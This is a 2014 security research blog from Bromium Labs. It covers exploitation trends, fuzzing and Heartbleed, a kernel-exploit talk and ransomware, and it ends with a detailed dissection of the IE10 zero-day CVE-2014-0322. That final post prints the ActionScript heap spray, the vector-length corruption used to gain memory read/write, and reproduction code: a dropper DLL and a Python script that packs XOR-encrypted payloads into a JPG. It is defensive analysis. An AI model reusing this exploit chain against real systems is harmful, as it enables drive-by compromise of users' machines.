July 22, 2014 / Br Labs

H1 2014 Endpoint Exploitation Trends

The Bromium Labs team got together and came up with a summary of notable exploitation trends that we observed in the first 6 months of 2014. There were some interesting takeaways:

- Internet Explorer set a record for the highest number of security patches in over a decade, and that feat was accomplished in just the first six months of 2014!

- As release timelines for new versions of Internet Explorer shrink, the time between security patches has shrunk as well. Expect more to come.

- In 2013, Oracle Java was the notorious favorite of malware authors and zero-day attacks, and exploit kits had a field day with it. Notably, there were no reported zero-day exploits targeting Java in H1 2014.

- Adobe Flash continued to be hit by zero days and also gave attackers new avenues for exploiting the browser (Internet Explorer).

- Attackers developed novel ways to attack browsers, leveraging ‘ActionScript spray’ to bypass ASLR. This technique was used by several zero-day exploits in the wild.

 

It’s evident that attackers continue to shift focus between ubiquitous internet-facing applications, but there’s a common theme throughout – attacking the end user. Will Java attacks continue to decline this year? Will attackers continue to focus on exploiting Internet Explorer? We’ll soon find out.

 

The full report is available to download here.

 

 

June 10, 2014 / Br Labs

Chrome dances with wolves

  “Lasker does not play chess, he plays dominoes.” – David Janowski, 1910

Alice sees her “browser” as the computer, not the network or operating system. This trend will only get stronger as BYOD takes hold. We’re in a brave new world, where traditional security models based on clear boundaries break down. Modern browsers’ cornerstone security approach, same-origin policy, entails significant complexity and controls only a limited subset of cross-domain interactions. Highly granular isolation within this context ends up breaking existing web-apps. In an odd way, one can see flashbacks and parallels to the old MS-DOS era.

Google Chrome is tipped for primacy as the definitive web browser. Google was among the first to deploy separate protection domains, which made things more difficult, and perhaps more exciting, for Eve. The Chromium architecture assigns the browser kernel to interact with the underlying OS on behalf of the user. Its rendering engine deals with “the web” via a high-quality sandbox. Thus, historically high-risk components such as the HTML parser, the JavaScript virtual machine, and the Document Object Model (DOM) became more difficult to leverage. Overall, Google’s browser is a strong candidate for secure browsing.

However, the state of the art in exploitation is now more dominoes than chess. Eve can bypass the sandbox via techniques ranging from kernel exploits to plugins to get to Alice. We now take a look at what happens with just a few tricks from an evergreen bag.

Let’s install the latest:

[Screenshot: Windows Update]

Alice then confidently proceeds to browse to her favorite videos. Unfortunately, Eve has compromised the site and planted an exploit with a custom payload. Conventional layers of defense including AV, sandboxes and firewalls fail to stop the attack:

[Screenshot: the attack with a custom payload evading conventional defenses]

If Alice was protected by vSentry, the attack would have been captured within a micro-VM. Her SOC team would then be able to trace Eve’s tracks via LAVA:

[Screenshot: annotated LAVA trace of the attack]

Perhaps, Chrome should dance with Bromium.

June 4, 2014 / Jared DeMott

Application Security Training

Training is an important part of the secure development lifecycle. It’s something EVERY security-conscious organization should be engaged in. But good training that is relevant to your developers and testers, as well as your security engineers and researchers, is hard to find. That’s why I developed a full two-day course called “Application Security: for Hackers and Developers”. In the course I cover the 4 pillars of application security: Code Auditing, Fuzzing, Reverse Engineering, and Exploit Development. Five years ago, when I realized there was no course that taught all 4 subjects in a balanced and deeply technical manner, I resolved to create one.

Over the last 4 years, I have offered the course to hundreds of students, who afterwards were equipped and energized to face their security threats and research goals.  To give people a small taste of this course, I’ve partnered with BlackHat to offer a free 35min webinar on application security.  The link to join the web training is here: https://www.blackhat.com/html/webcast/06192014-appsec-overview-deep-dive-and-trends.html  The event happens on June 19th, 2014.

I hope you’ll join us for the webcast, and perhaps I’ll see you in Las Vegas for the next offering of the full, hands-on course:

https://www.blackhat.com/us-14/training/application-security-for-hackers-and-developers.html

The training is Aug 2-3 or Aug 4-5, 2014.  Sign up, and keep securing your code!

May 27, 2014 / Vadim Kotov

CryptoDefense: The Ransomware Games have begun

Let the ransomware games begin! If you see a text and/or HTML document on your Desktop called HOW_TO_DECRYPT containing the CryptoDefense ransom message, then you were unfortunate enough to be the victim of another piece of crypto-ransomware. Recently, several of our field engineers encountered this ransomware encrypting files on victim machines. It is being distributed via Java drive-by downloads, and it’s likely that more victims will be targeted with this attack vector. We were able to capture the sample inside a micro-VM implemented in our product, so we have all the files and traffic involved in the attack. This allows us to skip the Java exploit and first-layer dropper for now and focus on the actual malware dropped. If we find something noteworthy in other parts of the attack we’ll post a follow-up article. Read more…

May 14, 2014 / Jared DeMott

Understanding how Fuzzing Relates to a Vulnerability like Heartbleed

Fuzzing is a security-focused testing technique in which a compiled program is executed so that the attack surface can be tested as it actually runs. The attack surfaces are the components of code that accept user input. Since this is the most vulnerable part of the code, it should be rigorously tested with anomalous data. During testing, the application is monitored for known bad states, such as an application crash, often the result of an out-of-bounds memory access. If a crash is found, the input and application state are stored for later review. Such a flaw is then entered as a security bug for developers to repair. A high-level view of fuzzing is shown in Figure 1.


Figure 1: Fuzzing Overview
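The same loop, stripped to its bare essentials, can be sketched in a few lines of Python. This is only an illustration of Figure 1, not any particular tool; the target binary, seed file and mutation strategy below are placeholders of our own choosing.

import random
import subprocess

def mutate(seed):
    # Flip a handful of random bytes in a known-good input.
    data = bytearray(seed)
    for _ in range(random.randint(1, 8)):
        data[random.randrange(len(data))] = random.randrange(256)
    return bytes(data)

def crashed(path):
    # Run the target on one input; a negative return code on POSIX means
    # the process was killed by a signal such as SIGSEGV.
    try:
        proc = subprocess.run(["./parser_under_test", path], timeout=5)
    except subprocess.TimeoutExpired:
        return False
    return proc.returncode < 0

seed = open("good_input.bin", "rb").read()
for i in range(10000):
    case = mutate(seed)
    with open("case.bin", "wb") as f:
        f.write(case)
    if crashed("case.bin"):
        # Store the offending input for later review, as in Figure 1.
        with open("crash_%d.bin" % i, "wb") as f:
            f.write(case)

Real fuzzers add coverage feedback, crash triage and far smarter mutation strategies, but the generate-run-monitor-save loop above is the part Figure 1 describes.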

Fuzzing is often an effective way to find bugs that are missed by manual and automated code reviews. Fuzzing also finds real flaws; unlike automated code-auditing tools, it has little problem with false positives. However, fuzzing tends to achieve only shallow penetration of complex protocols, and thus relatively weak code coverage. This is particularly true for code paths that require specialized input unlikely to be present in automatically generated test cases. That is why both static and dynamic testing approaches are critical to any well-formed secure development lifecycle (SDL).

I have not been briefed on exactly how the OpenSSL code is secured. The Heartbleed wiki page specifies how and when the bug was introduced into the code base, but it does not discuss how often code reviews and runtime testing are conducted. It would not be surprising to find out that a vulnerable version of the OpenSSL code had been fuzzed and yet the Heartbleed bug had been missed. Information disclosure bugs are easy to miss when fuzzing, because there may be no crash associated with them.

However, crashes are not the only exceptional condition fuzzers can look for. Access violations have been popular to search for in the past because they can sometimes lead to host-compromise exploits. But with the rise of low-level system protections like ASLR (address space layout randomization), leaking memory contents is a growing field of offensive study. Leaking the contents of memory helps attackers defeat ASLR. The Heartbleed disclosure was particularly exciting because cryptographic material could also potentially be leaked.

There are ways that fuzzing tools can observe potential memory leaks. For example, in the case of a protocol implementation like OpenSSL, the size of return packets can be recorded, and anything larger than expected should be reported. Likewise, if the returned data is of a well-known format, unknown data should be treated with suspicion. Also, detecting leaked memory is commonly accomplished by using a debug heap that places each allocation next to an unmapped page, as shown in Figure 2.


Figure 2: Debug Heap

If data is read beyond the scope of one allocation, a page fault will occur. Not all information leaks occur outside the bounds of an allocated buffer, but this approach is a good start. Most operating systems have a debug heap that can be optionally enabled. It is clear that the heartbeat extension was not fuzzed using a debug heap, or else this bug would have been detected. The beauty of using debug heaps for fuzzing is that your existing tools can continue to focus on catching crashes, and they will now find this bug type as well. The tradeoff is that the application, and therefore the fuzzer, will run slower.
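Returning to the first idea above (recording response sizes and flagging anything larger than expected), a minimal sketch might look like the following. The function names and the 64-byte threshold are ours, not from any existing fuzzer; for Heartbleed, send_probe would have to wrap a TLS handshake plus one malformed heartbeat record.

def flag_oversized_responses(send_probe, cases, expected_max=64):
    findings = []
    for payload, claimed_len in cases:
        response = send_probe(payload, claimed_len)
        # An information-disclosure bug never crashes the target, so instead
        # of watching for faults we compare what came back with what we sent.
        if len(response) > max(len(payload), expected_max):
            findings.append((claimed_len, len(response)))
    return findings

# Toy stand-in for a vulnerable service: it trusts the claimed length and
# pads its echo with "memory" it should never have sent back.
def leaky_target(payload, claimed_len):
    return payload + b"\x90" * max(0, claimed_len - len(payload))

print(flag_oversized_responses(leaky_target,
                               [(b"A" * 16, 16), (b"A" * 16, 0x4000)]))
# prints [(16384, 16384)]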

So was the heartbeat extension not fuzzed at all?  Or was improper technique or tooling used?  Either is likely; both often happen.

  • Overworked testers create fuzzing tools that test most of the protocol, but do not go back and retool the fuzzers for each code check-in. To combat this possibility, existing tools that test SSL could be used. Oftentimes proprietary fuzzers are required for special-purpose code, but SSL is a well-documented standard.
  • Improper technique is just as likely: the people charged with testing are smart developers or testers, but may lack critical security training. That is why many major projects now have a central security team that helps with security testing such as fuzzing.

To close the loop on this bug, the OpenSSL team should determine where the testing failure occurred and address the issue to ensure a similar situation does not occur again.

April 29, 2014 / Rafal Wojtczuk

“Bypassing endpoint protections” @ BSides London

This week I presented at BSides London. The talk is titled “Layers on layers: bypassing endpoint protection”. Its purpose is to reiterate the (well-known) common weakness of most endpoint protection products – their reliance on kernel integrity. Once an attacker achieves arbitrary code execution in the kernel, there is no barrier left that would prevent them from tampering with kernel-based security software.

In particular, I show that by enhancing the public exploit for the EPATHOBJ vulnerability with a custom kernel payload, it is possible to break many protections in a generic way. It does not help if multiple products are layered on top of each other – if they all depend on kernel integrity, then a single kernel vulnerability (of which there are plenty on Windows) can result in a compromise.

In this talk, we stack up various layers of security technologies and then use the custom kernel exploit to ultimately bypass them all. The layers tested for this presentation are: Anti-Virus, Host IPS, App Sandboxes, EMET, Kernel Rootkit Detectors and Intel SMEP.

I think the most interesting pieces of the presentation are another technique to conveniently bypass SMEP and an overview of methods for injecting code into usermode processes from the kernel (all on the Windows platform). The slides explain the techniques in more detail.

 

P.S.: As expected, no extra effort was needed to bypass AV or EMET, as these can’t do much against kernel-mode attacks.

 

 

February 25, 2014 / Vadim Kotov

Dissecting the newest IE10 0-day exploit (CVE-2014-0322)

A few days ago, news about a fresh Internet Explorer 10 zero-day exploit popped up. Now that the exploit code is publicly available, we have analyzed the vulnerability and found some details that have not been mentioned so far. At the time of writing this blog, the exploit is still unpatched.

We tested the exploit on Windows 7 SP1 Enterprise 32 bit with several versions of Flash Player (10, 11 and 12). The code provided in the article was derived from the actual exploit but we simplified it and gave some meaningful names to the variables.

A general diagram of the attack looks like this:

[Figure: General overview of the attack]

First, let’s see the vulnerability itself. To do that we need to get rid of the Flash part and call the vulnerable function explicitly:

<body onLoad = "puIHa3()">

We set up a simple Python web server (python.exe -m SimpleHTTPServer 8080) and ran IE10 in WinDbg by issuing this command:

windbg.exe -g -hd -o "C:\Program Files\Internet Explorer\iexplore.exe" http://localhost:8080/ie10_0day.html

Soon after the page loads, an exception occurs at MSHTML.DLL offset 281b97:

inc dword ptr [eax+10h]

EAX here holds the value provided in the exploit code as (0x1a1b2000 - 0x10), so the instruction ends up incrementing the dword at the heap address 0x1a1b2000. Apparently whoever found this vulnerability had figured out that it is well suited for a Flash-based ASLR bypass.

We noticed that in six or seven cases out of ten, Internet Explorer would crash before reaching the vulnerable condition. It may work better on other versions of Windows, but in our setup it is not very reliable.

The exploitation method is well described here and here. The exploit leverages the way ActionScript 3 Vector class instances are allocated in memory. The sprayed instances are aligned at 0x1000 boundaries, so when a big enough spray is provided, one of the allocations will end up at 0x1a1b2000 with high probability. This approach is not fully reliable, because in the presence of better randomization the heap may not align as expected.

This piece of ActionScript 3 code:


this.s = new Vector.<Object>(98688);

for (i=0; i < 98688; i++)
{
    this.s[i] = new Vector.<uint>(1022);
    this.s[i][0] = 0xDEADBEE1;
    this.s[i][2] = 0x1a1b2000;
    this.s[i][3] = 0x1a1b2000;
    this.s[i][110] = 0;
    this.s[i][186] = 0x41414141;  
}


produces the following memory layout, repeating every 0x1000 bytes:

1a1b2000 fe 03 00 00 00 20 55 0d e1 be ad de  ..... U.....
1a1b200c 00 00 00 00 00 20 1b 1a 00 20 1b 1a  ..... ... ..
*
1a1b12ec 00 00 00 00 41 41 41 41 00 00 00 00  ....AAAA....
1a1b12f8 00 00 00 00 00 00 00 00 00 00 00 00  ............
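For a rough sense of scale (this is our own back-of-the-envelope arithmetic, not something stated in the exploit), the spray above covers a very large slice of the 32-bit address space:

# Each Vector.<uint>(1022) holds 1022 * 4 = 4088 bytes of data plus a small
# header, so every sprayed instance effectively occupies one 0x1000-byte block.
VECTOR_COUNT = 98688         # 0x18180, the loop bound used by the spray
BLOCK_SIZE = 0x1000          # one block per vector, matching the dump above

sprayed = VECTOR_COUNT * BLOCK_SIZE
print(hex(sprayed), round(sprayed / 2**20, 1))   # 0x18180000, about 385.5 MiB
print(round(0x1a1b2000 / 2**20, 1))              # the target sits about 417.6 MiB
                                                 # into the address space

# The spray covers a ~385 MiB window starting wherever Flash's allocator
# happens to begin; as long as that window straddles 0x1a1b2000, one of the
# vectors lands on the magic address "with high probability", though, as noted
# above, not with certainty.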

The way Vector objects are handled is a bit different in the versions of the player prior to 11, so the exploit will not work on Flash 10.

The IE portion of the exploit can increment the doubleword 0x000003FE, which corresponds to the size of the vector. According to the AS3 documentation, a Vector is a dense array and accesses to its instances are bounds checked. So incrementing the size allows the attacker to modify one doubleword beyond the vector’s boundary – and this doubleword is the size of the next vector. Now the attacker can assign it some big number and access the whole process memory. This creates an R/W exploit primitive, which should allow a more reliable exploit to be created.

But how does the attacker know which vector was affected by the vulnerability? Or in other words, which element is at 0x1a1b2000? To find this out, the attacker’s AS3 code simply iterates through the parent vector (referenced as this.s in the code above) and stops when the current vector length is bigger than 0x03FE.

Let’s examine how this search procedure looks:

// Looking for the affected vector

for (i = 0; i < 0x18180; ++i) {
    if (this.s[i].length > 1022)
        break;
}

// This element is now writable since
// the length of the vector is 1023

this.s[i][1022] = 0x3FFFFFF0;

Now the next vector can access 0x3FFFFFF0 bytes of memory starting from its first element. This enables the exploit to iterate through memory and find the necessary ROP gadgets. To start the exploit, the toString() method of the Sound class is overwritten.
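The choice of index 1022 is not arbitrary. Judging from the dump above, where element [0] (0xDEADBEE1) sits at offset 8 behind the length dword and one further header field, the arithmetic works out as follows (a sketch based on that dump, not on documented Flash internals):

HEADER_SIZE = 8      # length dword plus one more dword, per the dump above
ELEM_SIZE = 4        # Vector.<uint> elements are 32-bit

offset_of_index_1022 = HEADER_SIZE + 1022 * ELEM_SIZE
print(hex(offset_of_index_1022))   # 0x1000: the first dword of the *next*
                                   # 0x1000-byte block, i.e. the neighbouring
                                   # vector's length field

# A legitimate length of 0x3FE allows indices 0..1021 only. Once the IE bug
# bumps the length to 0x3FF, index 1022 passes the bounds check and the write
# above turns the neighbour's length into 0x3FFFFFF0.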

The actual malicious payload is stored in a JPG image that the Flash component downloads and stores as a ByteArray (an array of binary data in AS3). We don’t have the image, so we had to reverse the image format via shellcode analysis. It has the following structure:

  • 36321 bytes of data (possibly legitimate image bytes);
  • 4 bytes: combined size of the two payloads (used during decryption);
  • 4 bytes: size of the dropper (supposedly a DLL);
  • 4 bytes: size of the malware binary;
  • the dropper, XOR-encrypted with key 0x95;
  • the malware binary, XOR-encrypted with key 0x95.

First the shellcode decrypts the payloads and then writes both to files (that’s why the sizes of each payload were provided). The target path is obtained via the GetTempPath function. The dropper is named sqlrenew.txt and the malware binary stream.exe. After writing the data to disk, the shellcode calls LoadLibrary and passes sqlrenew.txt as an argument.
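Sketched in Python, the unpacking step the shellcode performs would look roughly like this; the function and variable names are ours, while the 36321-byte prefix, the field order and the XOR key 0x95 come from the structure above:

import struct

KEY = 0x95
OFFSET = 36321                     # image bytes to skip before the header

def xor_decrypt(data):
    # Mirror the packer shown below: bytes equal to 0x00 or to the key are
    # left untouched, everything else is XORed with the key.
    return bytes(b if b in (0, KEY) else b ^ KEY for b in data)

def unpack_image(blob):
    # Three little-endian dwords: total payload size, dropper size, malware size.
    total_len, dll_len, mw_len = struct.unpack_from("<III", blob, OFFSET)
    body = blob[OFFSET + 12 : OFFSET + 12 + total_len]
    dropper = xor_decrypt(body[:dll_len])                   # written as sqlrenew.txt
    malware = xor_decrypt(body[dll_len:dll_len + mw_len])   # written as stream.exe
    return dropper, malware

The packing script we used to rebuild the image (shown further below) is simply the inverse of this.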

In order to reproduce the attack we prepared a simple DLL that would execute stream.exe:

#include <windows.h>
#include <string.h>

#define BUFFLEN 256
#define NAME "\\stream.exe"

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    char buf[BUFFLEN];
    DWORD len;
    if (fdwReason == DLL_PROCESS_ATTACH) {
        /* Build the full path to stream.exe in the temp directory and launch
           it. The ANSI variant of GetTempPath matches the char buffer;
           copying strlen(NAME) + 1 bytes keeps the terminating NUL. */
        len = GetTempPathA(BUFFLEN, buf);
        strncpy(&buf[len], NAME, strlen(NAME) + 1);
        WinExec(buf, SW_SHOWNORMAL);
    }
    return TRUE;
}

To test successful exploitation, we took calc.exe as our neutralized payload. To pack everything into the image, we wrote a Python script:

import struct

KEY = 0x95
OFFSET = 36321
DLL = 'dll.dll'
MALWARE = 'calc.exe'

def read_file(path):
    fd = open(path, 'rb')
    data = fd.read()
    fd.close()
    return data

def encrypt(data):
    encr_data = []
    for byte_ in data:
        if ord(byte_) == 0 or ord(byte_) == KEY:
            out_byte = byte_
        else:
            out_byte = chr(ord(byte_)^KEY)
        encr_data.append(out_byte)

    return ''.join(encr_data)

outfd = open('Erido.jpg', 'wb')

outfd.write('A'*OFFSET)

dll = read_file(DLL)
mw = read_file(MALWARE)

dll_len = len(dll)
mw_len = len(mw)

total_len_packed = struct.pack('<I', dll_len+mw_len)
dll_len_packed = struct.pack('<I', dll_len)
mw_len_packed = struct.pack('<I', mw_len)

outfd.write(total_len_packed)
outfd.write(dll_len_packed)
outfd.write(mw_len_packed)
outfd.write(encrypt(dll))
outfd.write(encrypt(mw))

outfd.close()

Thus the exploit first loads a DLL which calls calc.exe:

[Screenshot: calc.exe launched by the exploit]

Naturally, we tested this exploit against vSentry. The attack was successfully detected and isolated. All users of the vSentry product are protected from this attack (and from similar, as-yet-unseen attacks). Below is the brief LAVA trace we saw after reproducing the exploit successfully.

[Figure: LAVA graph of the attack]

Interestingly, we had to do some extra work to get this exploit running. It would crash before reaching the vulnerable condition, producing an error like this:

eax=00000000 ebx=29e62fa0 ecx=00000000 edx=0f0cecc0 esi=0f0cecc0 edi=0c264f50
eip=66621ba9 esp=0552991c ebp=05529988 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050246
MSHTML+0x281ba9:
66621ba9 83b8c001000000  cmp     dword ptr [eax+1C0h],0 ds:0023:000001c0=????????

We could only make it work after increasing the first allocation made by IE from 0x250 to 0x260 in this snippet (arrLen is the variable whose value we changed):

for (a = 0; a < arrLen; ++a) {
    g_arr[a] = document.createElement('div')
};

Furthermore, this exploit would also crash in the middle of the Flash DLL with Player version 11, despite the correct and seemingly exploitable memory layout.

These little issues suggest that either the exploit writers didn’t spend enough time perfecting the exploit, or perhaps they were in a hurry to get it deployed. But then again, the bad guys don’t need to infect all users; just a few are enough to make a reasonable profit.

We expect that there is a considerable risk of a more advanced version of this exploit appearing in the wild. One of Bromium Labs’ researchers, Jared DeMott, recently discussed how to bypass EMET, which is currently listed as one of the recommended tools to mitigate this zero-day exploit.
